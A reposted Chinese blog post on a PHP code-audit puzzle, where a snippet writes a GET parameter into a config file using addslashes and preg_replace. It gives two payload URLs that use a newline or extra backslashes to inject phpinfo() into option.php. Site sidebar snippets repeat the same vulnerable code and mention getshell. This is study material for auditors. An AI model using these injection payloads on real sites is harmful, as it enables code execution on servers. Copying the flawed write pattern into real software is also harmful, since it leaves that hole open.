小密圈专题(1)-配置文件写入问题

最新推荐文章于 2022-11-08 10:01:00 发布
最新推荐文章于 2022-11-08 10:01:00 发布
阅读量301 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/iamstudy/articles/config_file_write_vue.html
版权

p师傅的小密圈的一个问题

<?php
$str = addslashes($_GET['option']);
$file = file_get_contents('xxxxx/option.php');
$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $file);
file_put_contents('xxxxx/option.php', $file);

这个场景十分经典,常用在修改配置文件写入,但是又需要做一定的防御。

法一(利用正则的.*、单引号):

http://love.lemon:82/test/test.php?option=aaa';%0aphpinfo();//
http://love.lemon:82/test/test.php?option=a

这个其实是利用了正则的匹配问题,因为仔细研究一下,可以看到正则匹配的是

$option='任意内容';

如果输入aaaaa';xxxxx经过addslashes的单引号处理,成为\'

最后也就是$option='aaaaa\';xxxxx';

正则匹配的会是啥?=。=,其实最后还是能全部匹配到的,也就是aaaaa\';xxxxx';
当然最后通过注入了换行符突破,当然还需要再访问一次

http://love.lemon:82/test/test.php?option=a

通过正则将\替换掉

法二(利用preg_replace的转义):

http://love.lemon:82/test/test.php?option=aaa\';phpinfo();//

804631-20170224220708335-357648033.png

其中红色的框框中是经过preg_replace替换后的$file

可以看到与一开始经过addslashes函数处理后的aa\\\'三个\变成了两个\
猜测应该是preg_replace还是做了转义的处理,导致如此的一个变化,所以最后写入文件的也就是$option='aaa\\';phpinfo()//';

转载于:https://www.cnblogs.com/iamstudy/articles/config_file_write_vue.html

dengzhasong7076
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
组态王西门子帮助专题--协议配置
03-16
在“组态王西门子帮助专题--协议配置”这个主题中,我们主要探讨的是如何在组态王环境中配置与西门子设备之间的通信协议,以实现高效的数据交换和设备控制。 西门子OPC.chm文件很可能是关于西门子OPC(OLE for ...
gh-conf-write:写入gihub配置文件
04-29
将内容写入github配置文件 它读取github配置文件并返回其内容。 它需要存储库路径作为读取配置的输入。 给我们一个 :star: 如果你喜欢我们的工作 :red_heart: 如果您喜欢我的作品,请考虑捐赠 安装 $ npm ...
一个PHP正则相关的“经典漏洞” preg_replace
3569
01-02 7447
https://www.cdxy.me/?p=756小密圈《代码审计》中看到P神发的“经典漏洞”,关于写配置文件这个功能点。问题代码 $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',"\$optio
学习笔记-php代理审计_可能被利用的函数
人饭子的博客
11-08 405
in_array() 功能: 检查数组中是否存在某个值。 定义: in_array ( mixed $needle , array $haystack , bool $strict = false ) : bool 解释:大海捞针,在大海(haystack)中搜索针( needle),如果没有设置 strict 则使用宽松的比较。 当in_array()函数的第...
php写入配置文件getshell,php_addslashes绕过与写入文件配置getshell
weixin_32829465的博客
03-17 173
绕过addslashes并写入文件配置getshell写入配置getshell与addslashes绕过:$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$str';", $fi...
PHP正则经典漏洞
weixin_30819085的博客
03-01 172
@author: Dlive P牛在小密圈中发的一个有关使用PHP正则配合写配置文件导致Getshell的经典漏洞 漏洞代码是这样的: <?php //ph.php $str = addslashes($_GET['option']); $file = file_get_contents('option.php'); $file = preg_replace('|\$option=\'.*\...
php将配置信息写入文件,Php写入配置文件的经典漏洞
weixin_42313675的博客
03-29 370
phithon师父在小蜜圈里放了一个经典的配置文件写入问题漏洞.if(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_contents('./config.php');$file = preg_replace('|\$option=\'.*\';|', "\$option='$st...
python配置文件写入过程详解
09-18
主要介绍了python配置文件写入过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
MIPCMS 远程写入配置文件Getshell-1.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
IIS7.5提示无法写入配置文件web.config的解决方法
09-30
主要介绍了IIS7.5提示无法写入配置文件web.config的解决方法,需要的朋友可以参考下
php正则表达漏洞,一个PHP正则相关的“经典漏洞”
weixin_29504571的博客
04-02 221
小密圈《代码审计》中看到P神发的“经典漏洞”,关于写配置文件这个功能点。问题代码$str = addslashes($_GET['option']);$file = file_get_contents('xxxxx/option.php');$file = preg_replace('|\$option=\'.*\';|',"\$option='$str';",$file);file_put_co...
小密圈知识
11-03 201
p师傅的经典漏洞(小密圈的那些姿势) 2017年2月27日 p师傅在小密圈po的一个问题 <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|',...
php写入配置文件getshell,配置文件写入问题
weixin_39766867的博客
03-17 228
前言:最近开始学习代码审计,因为某种原因,容易健忘,所以,打算记录在简书,一点点的去记录自己在审计复现的日常,很多审计get到的姿势,都是在P神的小蜜圈里,还是挺爽的,在里面的每一个评论都可以让你少走弯路,所以,先在这里说明下来源出处。配置文件getshell一个经典的问题,很多getshell,都是在后台中,闭合+注释的方式,写入自己的shelleg:$website='';//我们写入:a';...
php_addslashes绕过与写入文件配置getshell
awanawan的博客
09-23 1048
绕过addslashes并写入文件配置getshellis_numeric函数 写入配置getshell与addslashes绕过: <?php $str = addslashes($_GET['option']); $file = file_get_contents('xxxxx/option.php'); $file = preg_replace('|\$option=\'.*\';|'...
PHP正则配合写配置文件导致Getshell
weixin_30888707的博客
12-21 355
PHP正则配合写配置文件导致Getshell,偶然间看到的一个题目, p 牛的小密圈的一个问题。 分析一下,漏洞代码: index.php <?php $str=addslashes($_GET['option']); $file=file_get_contents('option.php'); $file=preg_replace('|\$option=\'.*\';|',...
PHP代码审计–Challenge3
D-R0s1的博客
11-28 327
题目代码: index.php --------------------------------------------------------------------------- <?php $str = addslashes($_GET['option']); $file = file_get_content...
Getshell、文件上传绕过合集
晚风不及你
07-15 433
忘记在那个大佬的公众号上保存下来的了,为了保险点挂有道云链接,需要的自行查看。 链接: http://note.youdao.com/noteshare?id=51e22d12df941cd69eae5daf18468688&sub=AE2306B759DB4979BB136F12C104D040 部分展示: ...
ASP.NET Core 的本地配置文件写入
06-07
1. 首先,需要在应用程序的Startup.cs文件中添加以下代码来加载配置文件: ```csharp public Startup(IConfiguration configuration) { Configuration = configuration; } public IConfiguration Configuration {...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值